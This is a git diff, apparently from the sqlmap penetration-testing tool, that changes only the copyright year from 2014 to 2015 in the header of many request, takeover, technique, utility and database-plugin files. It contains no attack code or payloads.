index 66a96606e..487dac387 100644
--- a/lib/request/basicauthhandler.py
+++ b/lib/request/basicauthhandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/comparison.py b/lib/request/comparison.py
index f86c82e55..0cfb53957 100644
--- a/lib/request/comparison.py
+++ b/lib/request/comparison.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/connect.py b/lib/request/connect.py
index cbe8176a5..a09d710f3 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/direct.py b/lib/request/direct.py
index 86cc73ba7..937d6c5a4 100644
--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/dns.py b/lib/request/dns.py
index 007063ad1..8f10a605a 100644
--- a/lib/request/dns.py
+++ b/lib/request/dns.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index 47f09acb9..aa24eb474 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/inject.py b/lib/request/inject.py
index 4da700d94..9ff0cd638 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py
index dc69191c7..0ad3744b6 100644
--- a/lib/request/methodrequest.py
+++ b/lib/request/methodrequest.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py
index aa5d239ca..ea3aa7aad 100644
--- a/lib/request/pkihandler.py
+++ b/lib/request/pkihandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py
index 10716d85f..8288be55e 100644
--- a/lib/request/rangehandler.py
+++ b/lib/request/rangehandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py
index f67859af7..fca69c8dc 100644
--- a/lib/request/redirecthandler.py
+++ b/lib/request/redirecthandler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/request/templates.py b/lib/request/templates.py
index 395ef67dc..b95173ff9 100644
--- a/lib/request/templates.py
+++ b/lib/request/templates.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/takeover/__init__.py
+++ b/lib/takeover/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 4f51616e2..dd44fdafb 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py
index 685b43ab5..35cfe9881 100644
--- a/lib/takeover/icmpsh.py
+++ b/lib/takeover/icmpsh.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index e18aa9522..4f7b43887 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py
index 36dbe295f..fbeff3490 100644
--- a/lib/takeover/registry.py
+++ b/lib/takeover/registry.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index c1e508b79..13ec70dfe 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index cee0afd88..b6bf9ff41 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 5ab26f6a2..53f3a0722 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/__init__.py b/lib/techniques/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/__init__.py
+++ b/lib/techniques/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/blind/__init__.py b/lib/techniques/blind/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/blind/__init__.py
+++ b/lib/techniques/blind/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 4024abaab..071fe63a2 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/brute/__init__.py
+++ b/lib/techniques/brute/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py
index 6a5ea5682..4a1594590 100644
--- a/lib/techniques/brute/use.py
+++ b/lib/techniques/brute/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/dns/__init__.py
+++ b/lib/techniques/dns/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py
index 96c78f700..1d8b8c569 100644
--- a/lib/techniques/dns/test.py
+++ b/lib/techniques/dns/test.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py
index dead67d73..8b09335bd 100644
--- a/lib/techniques/dns/use.py
+++ b/lib/techniques/dns/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/error/__init__.py
+++ b/lib/techniques/error/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 9eb42d063..813a764c2 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/union/__init__.py b/lib/techniques/union/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/techniques/union/__init__.py
+++ b/lib/techniques/union/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py
index 50c92e441..b39bd6b5a 100644
--- a/lib/techniques/union/test.py
+++ b/lib/techniques/union/test.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py
index e1a043e70..034223c52 100644
--- a/lib/techniques/union/use.py
+++ b/lib/techniques/union/use.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/lib/utils/__init__.py
+++ b/lib/utils/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/api.py b/lib/utils/api.py
index 5ff22432d..9337fe000 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -2,7 +2,7 @@
 # -*- coding: utf-8 -*-
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index cead9875d..28b4d5790 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/deps.py b/lib/utils/deps.py
index c7f86e512..ea2f661e9 100644
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/getch.py b/lib/utils/getch.py
index 13f03fdb0..af9a56160 100644
--- a/lib/utils/getch.py
+++ b/lib/utils/getch.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/google.py b/lib/utils/google.py
index 9eb4b785d..b12de7ced 100644
--- a/lib/utils/google.py
+++ b/lib/utils/google.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 5a29a0556..bf3312c89 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py
index a6891c309..3f20432d9 100644
--- a/lib/utils/hashdb.py
+++ b/lib/utils/hashdb.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py
index 457f461f9..951c5c4a2 100644
--- a/lib/utils/htmlentities.py
+++ b/lib/utils/htmlentities.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py
index 8adaccf1c..392c3aaf9 100644
--- a/lib/utils/pivotdumptable.py
+++ b/lib/utils/pivotdumptable.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/progress.py b/lib/utils/progress.py
index e11e6283e..98397d81e 100644
--- a/lib/utils/progress.py
+++ b/lib/utils/progress.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/purge.py b/lib/utils/purge.py
index 97b1aaa75..1447f8061 100644
--- a/lib/utils/purge.py
+++ b/lib/utils/purge.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py
index 104d75d4e..9e24bba30 100644
--- a/lib/utils/sqlalchemy.py
+++ b/lib/utils/sqlalchemy.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py
index 2fba10bab..950caa717 100644
--- a/lib/utils/timeout.py
+++ b/lib/utils/timeout.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py
index 802e0cf59..a1cd1175a 100644
--- a/lib/utils/versioncheck.py
+++ b/lib/utils/versioncheck.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py
index 0e988be39..c5931b5d4 100644
--- a/lib/utils/xrange.py
+++ b/lib/utils/xrange.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/__init__.py b/plugins/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/plugins/__init__.py
+++ b/plugins/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py
index 5bad2814c..8d7bcd8f0 100644
--- a/plugins/dbms/__init__.py
+++ b/plugins/dbms/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py
index cec2df231..bfb66e57e 100644
--- a/plugins/dbms/access/__init__.py
+++ b/plugins/dbms/access/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py
index 4d84f02c1..03bcce91e 100644
--- a/plugins/dbms/access/connector.py
+++ b/plugins/dbms/access/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py
index d80cb9867..1dc5bd991 100644
--- a/plugins/dbms/access/enumeration.py
+++ b/plugins/dbms/access/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py
index f373f84db..ee471df2f 100644
--- a/plugins/dbms/access/filesystem.py
+++ b/plugins/dbms/access/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py
index eecaf728b..2cbe12835 100644
--- a/plugins/dbms/access/fingerprint.py
+++ b/plugins/dbms/access/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py
index bd7bf3251..b43500e15 100644
--- a/plugins/dbms/access/syntax.py
+++ b/plugins/dbms/access/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py
index 5370fe610..f36dd0b7f 100644
--- a/plugins/dbms/access/takeover.py
+++ b/plugins/dbms/access/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py
index afcdd7aae..0a5ea5718 100644
--- a/plugins/dbms/db2/__init__.py
+++ b/plugins/dbms/db2/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py
index 798df4122..feeb9b046 100644
--- a/plugins/dbms/db2/connector.py
+++ b/plugins/dbms/db2/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py
index 6f6ec2203..ba4fdef9c 100644
--- a/plugins/dbms/db2/enumeration.py
+++ b/plugins/dbms/db2/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py
index 5b548de7c..616958820 100644
--- a/plugins/dbms/db2/filesystem.py
+++ b/plugins/dbms/db2/filesystem.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py
index ea467c076..bc3f299ac 100644
--- a/plugins/dbms/db2/fingerprint.py
+++ b/plugins/dbms/db2/fingerprint.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py
index 403d20a0b..3a46c4d3b 100644
--- a/plugins/dbms/db2/syntax.py
+++ b/plugins/dbms/db2/syntax.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/db2/takeover.py b/plugins/dbms/db2/takeover.py
index 0146b4c7f..a505781cc 100644
--- a/plugins/dbms/db2/takeover.py
+++ b/plugins/dbms/db2/takeover.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/__init__.py b/plugins/dbms/firebird/__init__.py
index 2772a1813..2c63d088d 100644
--- a/plugins/dbms/firebird/__init__.py
+++ b/plugins/dbms/firebird/__init__.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/connector.py b/plugins/dbms/firebird/connector.py
index 6d153dc5c..0f9beb088 100644
--- a/plugins/dbms/firebird/connector.py
+++ b/plugins/dbms/firebird/connector.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/enumeration.py b/plugins/dbms/firebird/enumeration.py
index 9a3713743..1945860a0 100644
--- a/plugins/dbms/firebird/enumeration.py
+++ b/plugins/dbms/firebird/enumeration.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/plugins/dbms/firebird/filesystem.py b/plugins/dbms/firebird/filesystem.py
index a33886659..ed033c2b5 100644
